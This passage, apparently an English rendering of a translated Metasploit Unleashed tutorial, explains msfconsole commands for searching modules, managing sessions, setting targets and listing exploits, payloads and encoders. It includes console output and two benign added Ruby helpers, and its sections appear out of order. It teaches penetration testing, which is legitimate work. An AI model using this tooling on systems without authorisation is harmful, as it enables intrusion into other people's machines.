        route del 192.168.0.0 255.255.255.0 1

      Display the route that would be used for the given host or network
        route get 192.168.0.11

    meterpreter > route

    Network routes
    ==============

        Subnet           Netmask          Gateway
        ------           -------          -------
        0.0.0.0          0.0.0.0          172.16.1.254
        127.0.0.0        255.0.0.0        127.0.0.1
        172.16.1.0       255.255.255.0    172.16.1.100
        172.16.1.100     255.255.255.255  127.0.0.1
        172.16.255.255   255.255.255.255  172.16.1.100
        224.0.0.0        240.0.0.0        172.16.1.100
        255.255.255.255  255.255.255.255  172.16.1.100

    search

    msfconsole includes an extensive regular-expression based search facility. If you have a general idea of what you are looking for, you can find it with search. In the output below, a search is made for the Samba "username map script" module; the search function finds the string in module names, descriptions, references, etc.

    Note that the naming convention for Metasploit modules uses underscores, not hyphens.

    msf > search usermap_script

    Matching Modules
    ================

       Name                                Disclosure Date  Rank       Description
       ----                                ---------------  ----       -----------
       exploit/multi/samba/usermap_script  2007-05-14       excellent  Samba "username map script" Command Execution

    help

    You can further refine your searches with the built-in keyword system (this is the older, shorter keyword list; the msf6 `help search` output earlier on this page shows the current one).

    msf > help search
    Usage: search [keywords]

    Keywords:
      app       :  Modules that are client or server attacks
      author    :  Modules written by this author
      bid       :  Modules with a matching Bugtraq ID
      cve       :  Modules with a matching CVE ID
      edb       :  Modules with a matching Exploit-DB ID
      name      :  Modules with a matching descriptive name
      platform  :  Modules affecting this platform
      ref       :  Modules with a matching ref
      type      :  Modules of a specific type (exploit, auxiliary, or post)

    Examples:
      search cve:2009 type:exploit app:client

    name

    To search by descriptive name, use the name keyword.

    msf > search name:mysql

    Matching Modules
    ================

       Name                                               Disclosure Date  Rank       Description
       ----                                               ---------------  ----       -----------
       auxiliary/admin/mysql/mysql_enum                                    normal     MySQL Enumeration Module
       auxiliary/admin/mysql/mysql_sql                                     normal     MySQL SQL Generic Query
       auxiliary/analyze/jtr_mysql_fast                                    normal     John the Ripper MySQL Password Cracker (Fast Mode)
       auxiliary/scanner/mysql/mysql_authbypass_hashdump  2012-06-09       normal     MySQL Authentication Bypass Password Dump
       auxiliary/scanner/mysql/mysql_file_enum                             normal     MYSQL File/Directory Enumerator
       auxiliary/scanner/mysql/mysql_hashdump                              normal     MYSQL Password Hashdump
       auxiliary/scanner/mysql/mysql_login                                 normal     MySQL Login Utility
       auxiliary/scanner/mysql/mysql_schemadump                            normal     MYSQL Schema Dump
       auxiliary/scanner/mysql/mysql_version                               normal     MySQL Server Version Enumeration
       auxiliary/scanner/mysql/mysql_writable_dirs                         normal     MYSQL Directory Write Test
       auxiliary/server/capture/mysql                                      normal     Authentication Capture: MySQL
       exploit/linux/mysql/mysql_yassl_getname            2010-01-25       good       MySQL yaSSL CertDecoder::GetName Buffer Overflow
       exploit/linux/mysql/mysql_yassl_hello              2008-01-04       good       MySQL yaSSL SSL Hello Message Buffer Overflow
       exploit/windows/mysql/mysql_mof                    2012-12-01       excellent  Oracle MySQL for Microsoft Windows MOF Execution
       exploit/windows/mysql/mysql_payload                2009-01-16       excellent  Oracle MySQL for Microsoft Windows Payload Execution
       exploit/windows/mysql/mysql_start_up               2012-12-01       excellent  Oracle MySQL for Microsoft Windows FILE Privilege Abuse
       exploit/windows/mysql/mysql_yassl_hello            2008-01-04       average    MySQL yaSSL SSL Hello Message Buffer Overflow
       exploit/windows/mysql/scrutinizer_upload_exec      2012-07-27       excellent  Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential

    platform

    You can use platform to narrow the search down to modules that affect a specific platform.

    msf > search platform:aix

    Matching Modules
    ================

       Name                                   Disclosure Date  Rank       Description
       ----                                   ---------------  ----       -----------
       exploit/aix/local/ibstat_path          2013-09-24       excellent  ibstat $PATH Privilege Escalation
       exploit/aix/rpc_cmsd_opcode21          2009-10-07       great      AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
       exploit/aix/rpc_ttdbserverd_realpath   2009-06-17       great      ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)
       payload/aix/ppc/shell_bind_tcp                          normal     AIX Command Shell, Bind TCP Inline
       payload/aix/ppc/shell_find_port                         normal     AIX Command Shell, Find Port Inline
       payload/aix/ppc/shell_interact                          normal     AIX execve Shell for inetd
       payload/aix/ppc/shell_reverse_tcp                       normal     AIX Command Shell, Reverse TCP Inline
       post/aix/hashdump                                       normal     AIX Gather Dump Password Hashes
       post/multi/manage/sudo                                  normal     Multiple Linux / Unix Post Sudo Upgrade Shell
       post/multi/recon/local_exploit_suggester                normal     Multi Recon Local Exploit Suggester

    type

    Using type lets you filter by module type, such as auxiliary, post, exploit, etc.

    msf > search type:post

    Matching Modules
    ================

       Name                           Disclosure Date  Rank    Description
       ----                           ---------------  ----    -----------
       post/linux/gather/checkvm                       normal  Linux Gather Virtual Environment Detection
       post/linux/gather/enum_cron                     normal  Linux Cron Job Enumeration
       post/linux/gather/enum_linux                    normal  Linux Gather System Information
       ...snip...

    author

    Searching with the author keyword lets you find modules written by your favourite author.

    msf > search author:dookie

    Matching Modules
    ================

       Name                                                       Disclosure Date  Rank     Description
       ----                                                       ---------------  ----     -----------
       exploit/osx/http/evocam_webserver                          2010-06-01       average  MacOS X EvoCam HTTP GET Buffer Overflow
       exploit/osx/misc/ufo_ai                                    2009-10-28       average  UFO: Alien Invasion IRC Client Buffer Overflow
       exploit/windows/browser/amaya_bdo                          2009-01-28       normal   Amaya Browser v11.0 'bdo' Tag Overflow
       exploit/windows/browser/communicrypt_mail_activex          2010-05-19       great    CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow
       exploit/windows/browser/mozilla_reduceright                2011-06-21       normal   Mozilla Firefox Array.reduceRight() Integer Overflow
       exploit/windows/browser/nctaudiofile2_setformatlikesample  2007-01-24       normal   NCTAudioFile2 v2.x ActiveX Control SetFormatLikeSample() Buffer Overflow
       exploit/windows/fileformat/a_pdf_wav_to_mp3                2010-08-17       normal   A-PDF WAV to MP3 v1.0.0 Buffer Overflow
       exploit/windows/fileformat/adobe_illustrator_v14_eps       2009-12-03       great    Adobe Illustrator CS4 v14.0.0
       exploit/windows/fileformat/audio_wkstn_pls                 2009-12-08       good     Audio Workstation 6.4.2.4.3 pls Buffer Overflow
       exploit/windows/fileformat/audiotran_pls                   2010-01-09       good     Audiotran 1.4.1 (PLS File) Stack Buffer Overflow
       exploit/windows/fileformat/fatplayer_wav                   2010-10-18       normal   Fat Player Media Player 0.6b0 Buffer Overflow
       exploit/windows/fileformat/feeddemon_opml                  2009-02-09       great    FeedDemon Stack Buffer Overflow
       exploit/windows/fileformat/foxit_title_bof                 2010-11-13       great    Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
       exploit/windows/fileformat/ideal_migration_ipj             2009-12-05       great    PointDev IDEAL Migration Buffer Overflow
       exploit/windows/fileformat/millenium_mp3_pls               2009-07-30       great    Millenium MP3 Studio 2.0 (PLS File) Stack Buffer Overflow
       exploit/windows/fileformat/somplplayer_m3u                 2010-01-22       great    S.O.M.P.L 1.0 Player Buffer Overflow
       exploit/windows/fileformat/varicad_dwb                     2010-03-17       great    VariCAD 2010-2.05 EN (DWB File) Stack Buffer Overflow
       exploit/windows/fileformat/wm_downloader_m3u               2010-07-28       normal   WM Downloader 3.1.2.2 Buffer Overflow
       exploit/windows/ftp/trellian_client_pasv                   2010-04-11       normal   Trellian FTP Client 3.01 PASV Remote Buffer Overflow
       exploit/windows/ftp/xftp_client_pwd                        2010-04-22       normal   Xftp FTP Client 3.0 PWD Remote Buffer Overflow
       exploit/windows/misc/eureka_mail_err                       2009-10-22       normal   Eureka Email 2.2q ERR Remote Buffer Overflow
       exploit/windows/misc/hp_omniinet_4                         2011-06-29       good     HP OmniInet.exe Opcode 20 Buffer Overflow
       exploit/windows/misc/nettransport                          2010-01-02       normal   NetTransport Download Manager 2.90.510 Buffer Overflow
       exploit/windows/misc/ufo_ai                                2009-10-28       average  UFO: Alien Invasion IRC Client Buffer Overflow

    multiple

    You can also combine several keywords in one search to narrow the returned results further.

    msf > search cve:2011 author:jduck platform:linux

    Matching Modules

    ================

    Name Disclosure Date Rank Description

    ---- --------------- ---- -----------

    exploit/linux/misc/netsupport_manager_agent 2011-01-08 average NetSupport Manager Agent Remote Buffer Overflow

    sessions

    The sessions command lets you list, interact with, and kill spawned sessions. A session can be a command shell, a Meterpreter session, a VNC session, and so on.

    msf > sessions -h
    Usage: sessions [options] or sessions [id]

    Active session manipulation and interaction.

    OPTIONS:

        -C <opt>  Run a Meterpreter Command on the session given with -i, or all
        -K        Terminate all sessions
        -c <opt>  Run a command on the session given with -i, or all
        -h        Help banner
        -i <opt>  Interact with the supplied session ID
        -k <opt>  Terminate sessions by session ID and/or range
        -l        List all active sessions
        -q        Quiet mode
        -r        Reset the ring buffer for the session given with -i, or all
        -s <opt>  Run a script on the session given with -i, or all
        -t <opt>  Set a response timeout (default: 15)
        -u <opt>  Upgrade a shell to a meterpreter session on many platforms
        -v        List sessions in verbose mode
        -x        Show extended information in the session table

    Many options allow specifying session ranges using commas and dashes.
    For example:
      sessions -s checkvm -i 1,3-5
      sessions -k 1-2,5,6

    To list the active sessions, pass the -l option to sessions.

    msf exploit(3proxy) > sessions -l

    Active sessions

    ===============

    Id Description Tunnel

    -- ----------- ------

    1 Command shell 192.168.1.101:33191 -> 192.168.1.104:4444

    To interact with a given session, use the -i switch followed by the session's Id number.

    msf exploit(3proxy) > sessions -i 1

    [*] Starting interaction with 1...

    C:\WINDOWS\system32>
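    The comma-and-dash range syntax that sessions -i, sessions -k and sessions -c accept (for example 1,3-5 or 1-2,5,6) is worth handling carefully, because a mis-parsed range kills or commands the wrong session. The following is an added example in Ruby, not Metasploit's own session code: it parses such ranges strictly and applies them to a constructed session table that mirrors the columns of sessions -l above. Class and function names are hypothetical.

```ruby
# Added example, not Metasploit's own code: the comma/dash range syntax
# accepted by "sessions -i", "sessions -k" and friends, applied to a
# constructed session table. Names are hypothetical.

Session = Struct.new(:id, :type, :tunnel)

# "1,3-5" -> [1, 3, 4, 5]; "1-2,5,6" -> [1, 2, 5, 6]. Malformed input
# raises instead of quietly acting on the wrong sessions.
def parse_session_range(spec)
  ids = []
  spec.to_s.split(',').each do |part|
    part = part.strip
    case part
    when /\A\d+\z/
      ids << part.to_i
    when /\A(\d+)-(\d+)\z/
      lo = Regexp.last_match(1).to_i
      hi = Regexp.last_match(2).to_i
      raise ArgumentError, "reversed range #{part}" if lo > hi
      ids.concat((lo..hi).to_a)
    else
      raise ArgumentError, "bad session id #{part.inspect}"
    end
  end
  ids.uniq.sort
end

class SessionTable
  def initialize(sessions)
    @sessions = {}
    sessions.each { |s| @sessions[s.id] = s }
  end

  # sessions -l
  def list
    @sessions.values.sort_by(&:id)
  end

  # sessions -k RANGE: returns [killed ids, ids that did not exist]
  def kill(spec)
    killed = []
    missing = []
    parse_session_range(spec).each do |id|
      if @sessions.delete(id)
        killed << id
      else
        missing << id
      end
    end
    [killed, missing]
  end

  # sessions -K
  def kill_all
    ids = @sessions.keys.sort
    @sessions.clear
    ids
  end

  # sessions -c CMD -i RANGE: the sessions that would receive CMD
  def targets_for(spec)
    parse_session_range(spec).select { |id| @sessions.key?(id) }
  end
end

# Constructed sample mirroring the "sessions -l" columns shown above.
def sample_session_table
  SessionTable.new([
    Session.new(1, 'Command shell', '192.168.1.101:33191 -> 192.168.1.104:4444'),
    Session.new(2, 'meterpreter x86/windows', '192.168.1.101:4444 -> 192.168.1.105:49213'),
    Session.new(3, 'Command shell', '192.168.1.101:33192 -> 192.168.1.106:4444'),
    Session.new(5, 'meterpreter x86/windows', '192.168.1.101:4444 -> 192.168.1.107:49301')
  ])
end
```

    Ids that are not in the table are reported rather than ignored, so a typo in a range shows up as a "missing" id instead of silently doing nothing.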

    set

    The set command configures Framework options and parameters for the module you are currently working in.

    msf auxiliary(ms09_050_smb2_negotiate_func_index) > set RHOST 172.16.194.134

    RHOST => 172.16.194.134

    msf auxiliary(ms09_050_smb2_negotiate_func_index) > show options

    Module options (exploit/windows/smb/ms09_050_smb2_negotiate_func_index):

    Name Current Setting Required Description

    ---- --------------- -------- -----------

    RHOST 172.16.194.134 yes The target address

    RPORT 445 yes The target port

    WAIT 180 yes The number of seconds to wait for the attack to complete.

    Exploit target:

    Id Name

    -- ----

    0 Windows Vista SP1/SP2 and Server 2008 (x86)

    Metasploit also lets you choose the encoder to apply to the payload at run time. This is especially useful during exploit development, when you are not yet sure which payload encoding scheme a given exploit will tolerate.

    msf exploit(ms09_050_smb2_negotiate_func_index) > show encoders

    Compatible Encoders

    ===================

    Name Disclosure Date Rank Description

    ---- --------------- ---- -----------

    generic/eicar manual The EICAR Encoder

    generic/none normal The "none" Encoder

    x86/add_sub manual Add/Sub Encoder

    x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder

    x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder

    x86/avoid_underscore_tolower manual Avoid underscore/tolower

    x86/avoid_utf8_tolower manual Avoid UTF8/tolower

    x86/bloxor manual BloXor - A Metamorphic Block Based XOR Encoder

    x86/bmp_polyglot manual BMP Polyglot

    x86/call4_dword_xor normal Call+4 Dword XOR Encoder

    x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder

    x86/context_stat manual stat(2)-based Context Keyed Payload Encoder

    x86/context_time manual time(2)-based Context Keyed Payload Encoder

    x86/countdown normal Single-byte XOR Countdown Encoder

    x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder

    x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder

    x86/nonalpha low Non-Alpha Encoder

    x86/nonupper low Non-Upper Encoder

    x86/opt_sub manual Sub Encoder (optimised)

    x86/service manual Register Service

    x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder

    x86/single_static_bit manual Single Static Bit

    x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder

    x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder

    unset

    The counterpart of set is, of course, unset. unset removes a parameter previously configured with set; unset all removes every assigned variable in the current context.

    msf > set RHOSTS 192.168.1.0/24

    RHOSTS => 192.168.1.0/24

    msf > set THREADS 50

    THREADS => 50

    msf > set

    Global

    ======

    Name Value

    ---- -----

    RHOSTS 192.168.1.0/24

    THREADS 50

    msf > unset THREADS

    Unsetting THREADS...

    msf > unset all

    Flushing datastore...

    msf > set

    Global

    ======

    No entries in data store.

    setg

    To save a lot of typing during a pentest, you can set global variables within msfconsole with the setg command. Once set, they apply to every exploit and auxiliary module you use afterwards, and you can save them so they are loaded the next time msfconsole starts. The pitfall is forgetting that you have saved globals, so always check your options before you run or exploit; a stale RHOSTS left over from a previous engagement is an easy way to touch hosts that are out of scope. The unsetg command removes a global variable. In the examples that follow, variables are entered in all caps (for example LHOST), but Metasploit is case-insensitive, so that is not required.

    msf> setg LHOST 192.168.1.101

    LHOST => 192.168.1.101

    msf> setg RHOSTS 192.168.1.0/24

    RHOSTS => 192.168.1.0/24

    msf> setg RHOST 192.168.1.136

    RHOST => 192.168.1.136

    After setting your variables, run the save command to persist the current environment and settings. Saved settings are loaded automatically at startup, so you do not have to set everything again.

    msf > save

    Saved configuration to: /root/.msf4/config

    msf >
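    The precedence rules described in the set, unset and setg sections above (a module-local value shadows a global of the same name, unset only removes the local layer, and only unsetg removes the global) are modelled in the following added Ruby example. It is not Metasploit's own datastore code; class and method names are hypothetical, and the [framework/core] layout written by save_config is an assumed approximation of what save writes to ~/.msf4/config, not a parser-compatible copy.

```ruby
# Added example, not Metasploit's own datastore code: a model of how a
# module's datastore sits on top of the global datastore. Class and
# method names are hypothetical. Option names are case-insensitive, as
# they are in msfconsole.

class GlobalDataStore
  def initialize
    @vars = {}
  end

  # setg NAME VALUE
  def setg(name, value)
    @vars[name.to_s.upcase] = value
  end

  # unsetg NAME
  def unsetg(name)
    @vars.delete(name.to_s.upcase)
  end

  def getg(name)
    @vars[name.to_s.upcase]
  end

  def to_h
    @vars.dup
  end
end

class ModuleDataStore
  attr_reader :module_name

  def initialize(module_name, global)
    @module_name = module_name
    @global = global
    @local = {}
  end

  # set NAME VALUE: module-local, shadows a global of the same name
  def set(name, value)
    @local[name.to_s.upcase] = value
  end

  # unset NAME: removes only the local override; a global of the same
  # name, if one exists, becomes visible again
  def unset(name)
    @local.delete(name.to_s.upcase)
  end

  # unset all (inside a module): clears the local layer only
  def unset_all
    @local.clear
  end

  # Lookup order: module-local first, then global
  def get(name)
    key = name.to_s.upcase
    @local.key?(key) ? @local[key] : @global.getg(key)
  end

  # What "show options" would report: effective value plus its origin,
  # which is the check the text recommends before running anything
  def options
    keys = (@local.keys + @global.to_h.keys).uniq.sort
    keys.map { |k| [k, get(k), @local.key?(k) ? 'module' : 'global'] }
  end
end

# Assumed approximation of the INI layout of ~/.msf4/config written by
# "save": globals under [framework/core], module-local values under a
# section named after the module. Not guaranteed to match the real file.
def save_config(global, modules)
  lines = ['[framework/core]']
  global.to_h.sort.each { |k, v| lines << "#{k}=#{v}" }
  modules.each do |m|
    lines << '' << "[#{m.module_name}]"
    m.options.each { |k, v, origin| lines << "#{k}=#{v}" if origin == 'module' }
  end
  lines.join("\n") + "\n"
end

# The forgotten-global pitfall: an RHOSTS left over from an earlier
# engagement survives a module-level unset.
def forgotten_global_demo
  global = GlobalDataStore.new
  global.setg('RHOSTS', '192.168.1.0/24')   # set days ago, then saved
  global.setg('LHOST', '192.168.1.101')

  mod = ModuleDataStore.new('auxiliary/scanner/smb/smb_version', global)
  mod.set('rhosts', '10.0.0.5')   # lower-case works; this shadows the global
  after_set = mod.get('RHOSTS')

  mod.unset('RHOSTS')             # looks like the target was cleared...
  after_unset = mod.get('RHOSTS') # ...but the saved global is back

  global.unsetg('RHOSTS')         # only unsetg removes it for good
  after_unsetg = mod.get('RHOSTS')

  { after_set: after_set, after_unset: after_unset,
    after_unsetg: after_unsetg, lhost: mod.get('LHOST') }
end

puts forgotten_global_demo.inspect if __FILE__ == $0
```

    The options method reports where each effective value comes from; that origin column is exactly what you want to glance at before typing run, because a value marked global may have been set for a different network.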

    show

    Entering show at the msfconsole prompt displays every module within Metasploit.

    msf > show

    Encoders

    ========

    Name Disclosure Date Rank Description

    ---- --------------- ---- -----------

    cmd/generic_sh good Generic Shell Variable Substitution Command Encoder

    cmd/ifs low Generic ${IFS} Substitution Command Encoder

    cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder

    ...略...

    There are a number of show commands, but the ones you will use most often are show auxiliary, show exploits, show payloads, show encoders and show nops.

    auxiliary

    Executing show auxiliary displays a list of all the auxiliary modules available in Metasploit. As mentioned earlier, auxiliary modules include scanners, denial-of-service modules, fuzzers and more.

    msf > show auxiliary

    Auxiliary

    =========

    Name Disclosure Date Rank Description

    ---- --------------- ---- -----------

    admin/2wire/xslt_password_reset 2007-08-15 normal 2Wire Cross-Site Request Forgery Password Reset Vulnerability

    admin/backupexec/dump normal Veritas Backup Exec Windows Remote File Access

    admin/backupexec/registry normal Veritas Backup Exec Server Registry Access

    ...略...

    exploits

    Naturally, show exploits is the command you will be most interested in, since at its core Metasploit is about exploitation. Run show exploits to list every exploit contained in the framework.

    msf > show exploits

    Exploits

    ========

    Name Disclosure Date Rank Description

    ---- --------------- ---- -----------

    aix/rpc_cmsd_opcode21 2009-10-07 great AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow

    aix/rpc_ttdbserverd_realpath 2009-06-17 great ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)

    bsdi/softcart/mercantec_softcart 2004-08-19 great Mercantec SoftCart CGI Overflow

    ...略...

    MSFconsole Payloads

    Running show payloads displays all the payloads for every platform available in Metasploit.

    msf > show payloads

    Payloads

    ========

    Name Disclosure Date Rank Description

    ---- --------------- ---- -----------

    aix/ppc/shell_bind_tcp normal AIX Command Shell, Bind TCP Inline

    aix/ppc/shell_find_port normal AIX Command Shell, Find Port Inline

    aix/ppc/shell_interact normal AIX execve shell for inetd

    ...略...

    payloads

    As you can see, there are a lot of payloads available. Fortunately, when you are in the context of a particular exploit, running show payloads only displays the payloads that are compatible with that exploit.

    For instance, if it is a Windows exploit, you will not be shown the Linux payloads.

    msf exploit(ms08_067_netapi) > show payloads

    Compatible Payloads

    ===================

    Name Disclosure Date Rank Description

    ---- --------------- ---- -----------

    generic/custom normal Custom Payload

    generic/debug_trap normal Generic x86 Debug Trap

    generic/shell_bind_tcp normal Generic Command Shell, Bind TCP Inline

    ...略...

    options

    Once you have selected a specific module, issue show options to display which settings are available and/or required for it.

    msf exploit(ms08_067_netapi) > show options

    Module options:

    Name Current Setting Required Description

    ---- --------------- -------- -----------

    RHOST yes The target address

    RPORT 445 yes Set the SMB service port

    SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

    Exploit target:

    Id Name

    -- ----

    0 Automatic Targeting

    targets

    If you are not sure whether an operating system is vulnerable to a particular exploit, run show targets from within the context of the exploit module to see which targets are supported.

    msf exploit(ms08_067_netapi) > show targets

    Exploit targets:

    Id Name

    -- ----

    0 Automatic Targeting

    1 Windows 2000 Universal

    10 Windows 2003 SP1 Japanese (NO NX)

    11 Windows 2003 SP2 English (NO NX)

    12 Windows 2003 SP2 English (NX)

    ...略...

    advanced

    If you wish to fine-tune an exploit further, you can see the more advanced options by running show advanced.

    msf exploit(ms08_067_netapi) > show advanced

    Module advanced options (exploit/windows/smb/ms08_067_netapi):

    Name Current Setting Required Description

    ---- --------------- -------- -----------

    CHOST no The local client address

    CPORT no The local client port

    ConnectTimeout 10 yes Maximum number of seconds to establish a TCP connection

    ContextInformationFile no The information file that contains context information

    DCERPC::ReadTimeout 10 yes The number of seconds to wait for DCERPC responses

    DisablePayloadHandler false no Disable the handler code for the selected payload

    EnableContextEncoding false no Use transient context when encoding payloads

    NTLM::SendLM true yes Always send the LANMAN response (except when NTLMv2_session is specified)

    NTLM::SendNTLM true yes Activate the 'Negotiate NTLM key' flag, indicating the use of NTLM responses

    NTLM::SendSPN true yes Send an avp of type SPN in the ntlmv2 client blob, this allows authentication on Windows 7+/Server 2008 R2+ when SPN is required

    NTLM::UseLMKey false yes Activate the 'Negotiate Lan Manager Key' flag, using the LM key when the LM response is sent

    NTLM::UseNTLM2_session true yes Activate the 'Negotiate NTLM2 key' flag, forcing the use of a NTLMv2_session

    NTLM::UseNTLMv2 true yes Use NTLMv2 instead of NTLM2_session when 'Negotiate NTLM2' key is true

    Proxies no A proxy chain of format type:host:port[,type:host:port][...]

    SMB::ChunkSize 500 yes The chunk size for SMB segments, bigger values will increase speed but break NT 4.0 and SMB signing

    SMB::Native_LM Windows 2000 5.0 yes The Native LM to send during authentication

    SMB::Native_OS Windows 2000 2195 yes The Native OS to send during authentication

    SMB::VerifySignature false yes Enforces client-side verification of server response signatures

    SMBDirect true no The target port is a raw SMB service (not NetBIOS)

    SMBDomain . no The Windows domain to use for authentication

    SMBName *SMBSERVER yes The NetBIOS hostname (required for port 139 connections)

    SMBPass no The password for the specified username

    SMBUser no The username to authenticate as

    SSL false no Negotiate SSL/TLS for outgoing connections

    SSLCipher no String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"

    SSLVerifyMode PEER no SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)

    SSLVersion Auto no Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, SSL2, SSL3, SSL23, TLS, TLS1, TLS1.1, TLS1.2)

    VERBOSE false no Enable detailed status messages

    WORKSPACE no Specify the workspace for this module

    WfsDelay 0 no Additional delay when waiting for a session

    encoders

    Running show encoders displays a list of the encoders available within MSF.

    msf > show encoders

    Encoders

    ========

    Name Disclosure Date Rank Description

    ---- --------------- ---- -----------

    cmd/echo good Echo Command Encoder

    cmd/generic_sh manual Generic Shell Variable Substitution Command Encoder

    cmd/ifs low Generic ${IFS} Substitution Command Encoder

    cmd/perl normal Perl Command Encoder

    cmd/powershell_base64 excellent Powershell Base64 Command Encoder

    cmd/printf_php_mq manual printf(1) via PHP magic_quotes Utility Command Encoder

    generic/eicar manual The EICAR Encoder

    generic/none normal The "none" Encoder

    mipsbe/byte_xori normal Byte XORi Encoder

    mipsbe/longxor normal XOR Encoder

    mipsle/byte_xori normal Byte XORi Encoder

    mipsle/longxor normal XOR Encoder

    php/base64 great PHP Base64 Encoder

    ppc/longxor normal PPC LongXOR Encoder

    ppc/longxor_tag normal PPC LongXOR Encoder

    sparc/longxor_tag normal SPARC DWORD XOR Encoder

    x64/xor normal XOR Encoder

    x64/zutto_dekiru manual Zutto Dekiru

    x86/add_sub manual Add/Sub Encoder

    x86/alpha_mixed low Alpha2 Alphanumeric Mixedcase Encoder

    x86/alpha_upper low Alpha2 Alphanumeric Uppercase Encoder

    x86/avoid_underscore_tolower manual Avoid underscore/tolower

    x86/avoid_utf8_tolower manual Avoid UTF8/tolower

    x86/bloxor manual BloXor - A Metamorphic Block Based XOR Encoder

    x86/bmp_polyglot manual BMP Polyglot

    x86/call4_dword_xor normal Call+4 Dword XOR Encoder

    x86/context_cpuid manual CPUID-based Context Keyed Payload Encoder

    x86/context_stat manual stat(2)-based Context Keyed Payload Encoder

    x86/context_time manual time(2)-based Context Keyed Payload Encoder

    x86/countdown normal Single-byte XOR Countdown Encoder

    x86/fnstenv_mov normal Variable-length Fnstenv/mov Dword XOR Encoder

    x86/jmp_call_additive normal Jump/Call XOR Additive Feedback Encoder

    x86/nonalpha low Non-Alpha Encoder

    x86/nonupper low Non-Upper Encoder

    x86/opt_sub manual Sub Encoder (optimised)

    x86/service manual Register Service

    x86/shikata_ga_nai excellent Polymorphic XOR Additive Feedback Encoder

    x86/single_static_bit manual Single Static Bit

    x86/unicode_mixed manual Alpha2 Alphanumeric Unicode Mixedcase Encoder

    x86/unicode_upper manual Alpha2 Alphanumeric Unicode Uppercase Encoder

    nops

    Finally, running show nops displays the NOP generators that Metasploit has to offer.

    msf > show nops

    NOP Generators

    ==============

    Name Disclosure Date Rank Description

    ---- --------------- ---- -----------

    aarch64/simple normal Simple

    armle/simple normal Simple

    mipsbe/better normal Better

    php/generic normal PHP Nop Generator

    ppc/simple normal Simple

    sparc/random normal SPARC NOP Generator

    tty/generic normal TTY Nop Generator

    x64/simple normal Simple

    x86/opty2 normal Opty2

    x86/single_byte normal Single Byte

    use

    When you have decided on a particular module, issue the use command to select it. The use command changes your context to that module and exposes the commands specific to its type. Notice in the output below that any global variables set previously are already configured.

    msf > use dos/windows/smb/ms09_001_write

    msf auxiliary(ms09_001_write) > show options

    Module options:

    Name Current Setting Required Description

    ---- --------------- -------- -----------

    RHOST yes The target address

    RPORT 445 yes Set the SMB service port

    msf auxiliary(ms09_001_write) >

    Translator's note 1: this article is a Chinese translation of Metasploit Unleashed. Original: https://www.offensive-security.com/metasploit-unleashed/

    Translator's note 2: to lighten the translation workload, machine translation was used; the translator manually removed mistranslations and ambiguities, but small problems may remain. Corrections are welcome in the comments below the article.

    IV. Metasploit Fundamentals

    2. MSFconsole

    [Figure: msfconsole help command output]

    a) What is MSFconsole?

    MSFconsole is probably the most popular interface to the Metasploit Framework (MSF). It provides an "all-in-one" centralized console and lets you access efficiently virtually all of the options available in MSF. MSFconsole may seem intimidating at first, but once you learn the syntax of the commands you will come to appreciate the power of this interface.

    b) Benefits of using MSFconsole

    • It is the only supported way to access most of the features within Metasploit.
    • Provides a console-based interface to the framework
    • Contains the most features and is the most stable MSF interface
    • Full readline support, tabbing, and command completion
    • External commands can be executed from within MSFconsole:
    msf > ping -c 1 192.168.1.100
    [*] exec: ping -c 1 192.168.1.100
    
    PING 192.168.1.100 (192.168.1.100) 56(84) bytes of data.
    64 bytes from 192.168.1.100: icmp_seq=1 ttl=128 time=10.3 ms
    
    --- 192.168.1.100 ping statistics ---
    1 packets transmitted, 1 received, 0% packet loss, time 0ms
    rtt min/avg/max/mdev = 10.308/10.308/10.308/0.000 ms
    msf >
    

    c) Launching MSFconsole

    MSFconsole is launched by running msfconsole from the command line; the launcher itself is located at /usr/share/metasploit-framework/msfconsole.
    The -q option suppresses the launch banner by starting msfconsole in quiet mode.

    root@kali:# msfconsole -q
    msf >
    

    d) Using the command prompt

    You can pass -h to msfconsole to see the other usage options available to you.

    root@kali:~# msfconsole -h
    Usage: msfconsole [options]
    
    Common options
        -E, --environment ENVIRONMENT    The Rails environment. Will use RAIL_ENV environment variable if that is set.  Defaults to production if neither option not RAILS_ENV environment variable is set.
    
    Database options
        -M, --migration-path DIRECTORY   Specify a directory containing additional DB migrations
        -n, --no-database                Disable database support
        -y, --yaml PATH                  Specify a YAML file containing database settings
    
    Framework options
        -c FILE                          Load the specified configuration file
        -v, --version                    Show version
    
    Module options
            --defer-module-loads         Defer module loading unless explicitly asked.
        -m, --module-path DIRECTORY      An additional module path
    
    
    Console options:
        -a, --ask                        Ask before exiting Metasploit or accept 'exit -y'
        -d, --defanged                   Execute the console as defanged
        -L, --real-readline              Use the system Readline library instead of RbReadline
        -o, --output FILE                Output to the specified file
        -p, --plugin PLUGIN              Load a plugin on startup
        -q, --quiet                      Do not print the banner on startup
        -r, --resource FILE              Execute the specified resource file (- for stdin)
        -x, --execute-command COMMAND    Execute the specified string as console commands (use ; for multiples)
        -h, --help                       Show this message
    

    Entering help at the msf command prompt displays a list of the available commands along with a description of what each one is used for.

    msf > help
    
    Core Commands
    =============
    
        Command       Description
        -------       -----------
        ?             Help menu
        advanced      Displays advanced options for one or more modules
        back          Move back from the current context
        banner        Display an awesome metasploit banner
        cd            Change the current working directory
        color         Toggle color
        connect       Communicate with a host
        edit          Edit the current module with $VISUAL or $EDITOR
        exit          Exit the console
